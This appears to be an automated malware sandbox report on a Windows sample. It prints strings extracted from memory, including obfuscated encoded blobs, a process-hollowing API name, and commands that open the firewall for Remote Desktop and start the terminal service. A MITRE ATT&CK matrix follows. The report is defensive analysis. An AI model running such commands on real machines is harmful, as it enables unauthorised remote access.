s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE, 0000002D.00000003.2150116458.0000000004960000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE, 0000002D.00000003.2150116458.0000000004960000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE, 0000002D.00000002.2190924706.0000000000161000.00000040.00000001.01000000.0000001A.sdmpString found in binary or memory: net start termservice
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE, 0000002D.00000002.2190924706.0000000000161000.00000040.00000001.01000000.0000001A.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE, 00000031.00000003.2208833201.0000000004A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE, 00000031.00000003.2208833201.0000000004A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE, 00000031.00000002.2286174496.0000000000161000.00000040.00000001.01000000.0000001A.sdmpString found in binary or memory: net start termservice
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE, 00000031.00000002.2286174496.0000000000161000.00000040.00000001.01000000.0000001A.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C91204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00C91204
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C91806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00C91806

                                                Mitre Att&ck Matrix

                                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                                Gather Victim Identity Information1
                                                Scripting                                                		2
                                                Valid Accounts                                                		21
                                                Windows Management Instrumentation                                                		1
                                                Scripting                                                		1
                                                Exploitation for Privilege Escalation                                                		11
                                                Disable or Modify Tools                                                		2
                                                OS Credential Dumping                                                		2
                                                System Time Discovery                                                		1
                                                Remote Desktop Protocol                                                		11
                                                Archive Collected Data                                                		14
                                                Ingress Tool Transfer                                                		Exfiltration Over Other Network Medium1
                                                System Shutdown/Reboot
                                                CredentialsDomainsDefault Accounts1
                                                Native API                                                		1
                                                DLL Side-Loading                                                		1
                                                DLL Side-Loading                                                		11
                                                Deobfuscate/Decode Files or Information                                                		21
                                                Input Capture                                                		1
                                                Account Discovery                                                		Remote Desktop Protocol4
                                                Data from Local System                                                		11
                                                Encrypted Channel                                                		Exfiltration Over BluetoothNetwork Denial of Service
                                                Email AddressesDNS ServerDomain Accounts1
                                                Exploitation for Client Execution                                                		2
                                                Valid Accounts                                                		1
                                                Extra Window Memory Injection                                                		4
                                                Obfuscated Files or Information                                                		Security Account Manager3
                                                File and Directory Discovery                                                		SMB/Windows Admin Shares1
                                                Screen Capture                                                		1
                                                Non-Standard Port                                                		Automated ExfiltrationData Encrypted for Impact
                                                Employee NamesVirtual Private ServerLocal Accounts2
                                                Command and Scripting Interpreter                                                		11
                                                Scheduled Task/Job                                                		2
                                                Valid Accounts                                                		22
                                                Software Packing                                                		NTDS2610
                                                System Information Discovery                                                		Distributed Component Object Model11
                                                Email Collection                                                		1
                                                Remote Access Software                                                		Traffic DuplicationData Destruction
                                                Gather Victim Network InformationServerCloud Accounts11
                                                Scheduled Task/Job                                                		111
                                                Registry Run Keys / Startup Folder                                                		21
                                                Access Token Manipulation                                                		1
                                                Timestomp                                                		LSA Secrets1
                                                Query Registry                                                		SSH21
                                                Input Capture                                                		4
                                                Non-Application Layer Protocol                                                		Scheduled TransferData Encrypted for Impact
                                                Domain PropertiesBotnetReplication Through Removable Media2
                                                PowerShell                                                		RC Scripts412
                                                Process Injection                                                		1
                                                DLL Side-Loading                                                		Cached Domain Credentials991
                                                Security Software Discovery                                                		VNC3
                                                Clipboard Data                                                		125
                                                Application Layer Protocol                                                		Data Transfer Size LimitsService Stop
                                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items11
                                                Scheduled Task/Job                                                		1
                                                Extra Window Memory Injection                                                		DCSync381
                                                Virtualization/Sandbox Evasion                                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job111
                                                Registry Run Keys / Startup Folder                                                		11
                                                Masquerading                                                		Proc Filesystem3
                                                Process Discovery                                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                                                Valid Accounts                                                		/etc/passwd and /etc/shadow11
                                                Application Window Discovery                                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron381
                                                Virtualization/Sandbox Evasion                                                		Network Sniffing1
                                                System Owner/User Discovery                                                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
                                                Access Token Manipulation                                                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task412
                                                Process Injection                                                		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                                                Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
